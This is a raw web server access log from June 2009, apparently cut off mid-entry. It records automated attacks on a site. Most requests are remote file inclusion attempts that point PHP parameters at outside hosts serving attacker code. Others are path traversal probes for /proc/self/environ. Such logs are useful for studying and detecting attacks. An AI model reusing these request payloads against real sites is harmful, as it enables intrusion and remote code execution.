83.245.33.38 - - [06/Jun/2009:07:02:34 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:02:35 -0400] "GET /logs/error_log.Q108112400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:02:35 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:02:49 -0400] "GET /logs/access_log.Q109031800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:07:05:30 -0400] "GET //index.php?lang=en&cat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:05:30 -0400] "GET /logs/error_log.Q109042900//index.php?lang=en&cat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:05:31 -0400] "GET //index.php?lang=en&cat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:05:33 -0400] "GET /logs//index.php?lang=en&cat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:05:33 -0400] "GET /logs//index.php?lang=en&cat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:05:33 -0400] "GET /logs/error_log.Q109042900//index.php?lang=en&cat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
218.249.36.194 - - [06/Jun/2009:07:06:50 -0400] "GET /logs/access_log.Q109052500///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:07:07:14 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:07:07:14 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:07:07:14 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:07:07:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.6.232.171 - - [06/Jun/2009:07:07:26 -0400] "GET /logs/access_log.Q109051100///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:39 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:39 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:39 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:39 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:39 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:39 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.232.119.212 - - [06/Jun/2009:07:07:43 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.232.119.212 - - [06/Jun/2009:07:07:43 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.232.119.212 - - [06/Jun/2009:07:07:43 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.232.119.212 - - [06/Jun/2009:07:07:55 -0400] "GET /logs/access_log.Q109051100///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:56 -0400] "GET /logs/access_log.Q109051100///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:07:57 -0400] "GET /logs/access_log.Q109051100///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
84.32.195.2 - - [06/Jun/2009:07:08:34 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
213.229.183.76 - - [06/Jun/2009:07:09:15 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
83.149.105.122 - - [06/Jun/2009:07:09:47 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:10:28 -0400] "GET /logs/access_log.Q109050300/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.32.195.2 - - [06/Jun/2009:07:10:45 -0400] "GET /logs/access_log.Q109052100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
84.32.195.2 - - [06/Jun/2009:07:10:45 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
84.32.195.2 - - [06/Jun/2009:07:10:46 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
83.245.33.38 - - [06/Jun/2009:07:10:47 -0400] "GET /logs/access_log.Q109051600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.32.195.2 - - [06/Jun/2009:07:11:02 -0400] "GET /logs/access_log.Q109052300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
60.251.217.4 - - [06/Jun/2009:07:11:49 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:11:54 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:12:00 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:12:00 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:12:05 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:07:12:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.1.64.133 - - [06/Jun/2009:07:12:42 -0400] "GET /logs/access_log.Q109052400/%20/components/com_simpleboard/image_upload.php?sbp=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 270 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.1.64.133 - - [06/Jun/2009:07:12:42 -0400] "GET /logs/%20/components/com_simpleboard/image_upload.php?sbp=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 248 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.1.64.133 - - [06/Jun/2009:07:12:42 -0400] "GET /%20/components/com_simpleboard/image_upload.php?sbp=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 243 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.1.64.133 - - [06/Jun/2009:07:12:43 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [06/Jun/2009:07:12:43 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [06/Jun/2009:07:12:43 -0400] "GET /logs/access_log.Q109052400/%20/components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 270 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:12:43 -0400] "GET /%20/components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 243 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:12:44 -0400] "GET /%20/components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:07:12:46 -0400] "GET /logs/access_log.Q109052400/%20/components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "XXXXXX"
60.251.217.4 - - [06/Jun/2009:07:12:54 -0400] "GET /logs/access_log.Q109051100///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:07:12:58 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [06/Jun/2009:07:12:58 -0400] "GET /logs/%20/components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 248 "-" "XXXXXX"
201.232.54.48 - - [06/Jun/2009:07:12:59 -0400] "GET /logs/access_log.Q109052500///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:07:13:02 -0400] "GET /logs/%20/components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "XXXXXX"
66.232.119.212 - - [06/Jun/2009:07:13:29 -0400] "GET /logs/error_log.Q109052800%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:07:13:35 -0400] "GET /logs/error_log.Q109052800%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.232.119.212 - - [06/Jun/2009:07:13:39 -0400] "GET /logs/access_log.Q109051100%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:07:13:39 -0400] "GET /logs/access_log.Q109051100%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:14:29 -0400] "GET /logs/error_log.Q109052800%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:14:29 -0400] "GET /logs/error_log.Q109052800%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:14:40 -0400] "GET /logs/access_log.Q109051100%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
137.82.178.84 - - [06/Jun/2009:07:14:40 -0400] "GET /logs/access_log.Q109051100%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:14:41 -0400] "GET /modules/xfsection/modify.php?dir_module=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:14:41 -0400] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:14:41 -0400] "GET /logs/error_log.Q108122800%20%20/modules/xfsection/modify.php?dir_module=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
60.251.217.4 - - [06/Jun/2009:07:16:28 -0400] "GET /logs/error_log.Q108122800%20%20/modules/xfsection/modify.php?dir_module=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:07:17:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.122.170.50 - - [06/Jun/2009:07:18:19 -0400] "GET /logs/access_log.Q109051000//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
86.122.170.50 - - [06/Jun/2009:07:18:19 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
86.122.170.50 - - [06/Jun/2009:07:18:20 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
86.122.170.50 - - [06/Jun/2009:07:18:24 -0400] "GET /logs/access_log.Q109052400//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
60.251.217.4 - - [06/Jun/2009:07:19:34 -0400] "GET /logs/error_log.Q109052800%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:07:22:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.196.124.252 - - [06/Jun/2009:07:24:54 -0400] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
81.196.124.252 - - [06/Jun/2009:07:24:54 -0400] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
86.122.170.50 - - [06/Jun/2009:07:25:54 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
86.122.170.50 - - [06/Jun/2009:07:25:54 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
86.122.170.50 - - [06/Jun/2009:07:25:54 -0400] "GET /logs/access_log.Q109051000%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
86.122.170.50 - - [06/Jun/2009:07:25:55 -0400] "GET /logs/access_log.Q109052400%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:07:26:03 -0400] "GET /logs/index.php?arquivo=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:07:26:03 -0400] "GET /logs/access_log.Q109053100/index.php?arquivo=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:07:26:03 -0400] "GET /index.php?arquivo=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /logs/index.php?canal=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 212 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /logs/access_log.Q109052300/index.php?canal=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /index.php?canal=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 207 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /logs/index.php?canal=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /logs/access_log.Q109052300/index.php?canal=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:27:25 -0400] "GET /index.php?canal=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:27:26 -0400] "GET /logs/index.php?canal=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:27:26 -0400] "GET /logs/access_log.Q109052300/index.php?canal=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:27:26 -0400] "GET /index.php?canal=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
209.59.12.99 - - [06/Jun/2009:07:27:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.251.217.4 - - [06/Jun/2009:07:28:15 -0400] "GET /logs/access_log.Q109051100%20%20///include/mail.inc.php?skin_board_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:28:41 -0400] "GET //?_zb_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:28:41 -0400] "GET /logs//?_zb_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 200 4371 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:28:41 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.245.33.38 - - [06/Jun/2009:07:28:46 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:07:29:07 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?arquivo=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:07:29:16 -0400] "GET /logs/access_log.Q109053100/index.php?arquivo=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:07:29:16 -0400] "GET /index.php?arquivo=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:07:29:16 -0400] "GET /logs/index.php?arquivo=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:07:29:29 -0400] "GET /logs/error_log.Q109052300/index.php?canal=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/3.0 (X1